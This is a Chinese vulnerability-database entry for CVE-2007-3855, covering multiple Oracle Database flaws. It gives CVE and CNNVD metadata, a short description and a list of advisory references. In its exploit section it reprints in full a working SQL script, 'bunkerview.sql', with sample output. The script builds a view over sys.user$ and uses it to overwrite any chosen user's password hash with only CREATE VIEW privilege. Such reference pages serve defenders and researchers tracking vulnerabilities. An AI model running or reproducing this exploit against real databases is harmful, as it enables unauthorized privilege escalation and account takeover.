Oracle Database 多个未明安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113292 漏洞类型
发布时间 2007-07-12 更新时间 2007-07-20
CVE编号 CVE-2007-3855 CNNVD-ID CNNVD-200707-352
漏洞平台 Multiple CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/30295
https://cxsecurity.com/issue/WLB-2007070058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-352
|漏洞详情
OracleDatabase是一款商业性质大型数据库系统。OracleDatabase存在多个未明安全漏洞,远程远程认证用户可以通过多个组件获得未知影响:(1)SYS.DBMS_DRS组件DataGuard(DB03),(2)SYS.DBMS_STANDARD组件PL/SQL(DB10),(3)MDSYS.RTREE_IDX组件Spatial(DB16),(4)SQLCompiler(DB17).Database服务器所提供DBMS_DRS软件包中的GET_PROPERTY函数存在缓冲区溢出,任何对该软件包拥有EXECUTE权限的用户都可以利用这个漏洞导致拒绝服务或执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/24887/info

Oracle has released a Critical Patch Update advisory for July 2007 to address multiple vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected by these issues as well.

The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. 

--
-- bunkerview.sql 
--
-- Oracle 9i/10g - evil view exploit (CVE-2007-3855)
-- Uses evil view to perform unauthorized password update
--
-- by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
--
-- This code should be used only for LEGAL purpose!
-- ...and remember: use Oracle at your own risk ;-)
--
-- Thanks to security researchers all around the world...
-- Smarties rules (they know what I mean)! ;-D
--
--
-- SQL> select * from user_sys_privs;
-- 
-- USERNAME                       PRIVILEGE                                ADM
-- ------------------------------ ---------------------------------------- ---
-- TEST                           CREATE VIEW                              NO
-- TEST                           CREATE SESSION                           NO
--
-- SQL> select password from sys.user$ where name='TEST';
--
-- PASSWORD
-- ------------------------------
-- AAAAAAAAAAAAAAAA
-- 
-- SQL> @bunkerview
-- [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
-- [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
-- [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
-- 
-- Target username (default TEST):
-- 
-- View created.
-- 
-- old   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user'
-- new   1:   update bunkerview set password='6D9FEAAB597EF01B' where name='TEST'
-- 
-- 1 row updated.
-- 
-- 
-- View dropped.
-- 
-- 
-- Commit complete.
-- 
-- SQL> select password from sys.user$ where name='TEST';
-- 
-- PASSWORD
-- ------------------------------
-- 6D9FEAAB597EF01B
--
set serveroutput on;
prompt [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
prompt [+] 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
prompt 
undefine the_user;
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';
create or replace view bunkerview as 
  select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;
  update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user';
  drop view bunkerview;
commit;
|参考资料

来源:US-CERT
名称:TA07-200A
链接:http://www.us-cert.gov/cas/techalerts/TA07-200A.html
来源:VUPEN
名称:ADV-2007-2562
链接:http://www.frsirt.com/english/advisories/2007/2562
来源:BUGTRAQ
名称:20070718OracleSecurity:Insert/Update/DeleteDataviaViews
链接:http://www.securityfocus.com/archive/1/archive/1/473997/100/0/threaded
来源:MISC
链接:http://www.red-database-security.com/advisory/oracle_view_vulnerability.html
来源:MISC
链接:http://www.red-database-security.com/advisory/oracle_cpu_jul_2007.html
来源:www.oracle.com
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2007.html
来源:SECUNIA
名称:26114
链接:http://secunia.com/advisories/26114
来源:XF
名称:oracle-unauth-view-access(35495)
链接:http://xforce.iss.net/xforce/xfdb/35495
来源:XF
名称:oracle-cpu-july2007(35490)
链接:http://xforce.iss.net/xforce/xfdb/35490
来源:SECTRACK
名称:1018415
链接:http://www.securitytracker.com/id?1018415
来源:BUGTRAQ
名称:20070721OraclebadViews-Exploitreleased
链接:http://www.securityfocus.com/archive/1/archive/1/474326/100/0/threade